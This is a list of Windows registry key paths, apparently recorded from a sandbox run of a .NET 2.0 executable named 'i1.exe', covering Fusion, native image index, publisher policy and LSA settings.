HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\Internet HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\LocalIntranet HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000 HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\v2.0.50727\Security\Policy HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\NIUsageMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\ILUsageMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\GACChangeNotification\Default HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86 HKEY_LOCAL_MACHINE\Software\Microsoft\StrongName 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6418cf\6185f1ae HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\PublisherPolicy\Default HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index23 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Windows.Forms__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\DisplayName 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\DisplayName 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Drawing__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Xml__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Configuration__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Deployment__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Runtime.Serialization.Formatters.Soap__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.Accessibility__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Security__b03f5f7f11d50a3a 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.8.0.Microsoft.VisualBasic__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\DisplayName 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\DisplayName 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.VisualBasic,8.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Web__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Web,2.0.0.0,,b03f5f7f11d50a3a,x86 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Management__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Management,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Runtime.Remoting__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Remoting,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it-IT_b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5e8c75c\40dcb014 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|i1.exe 
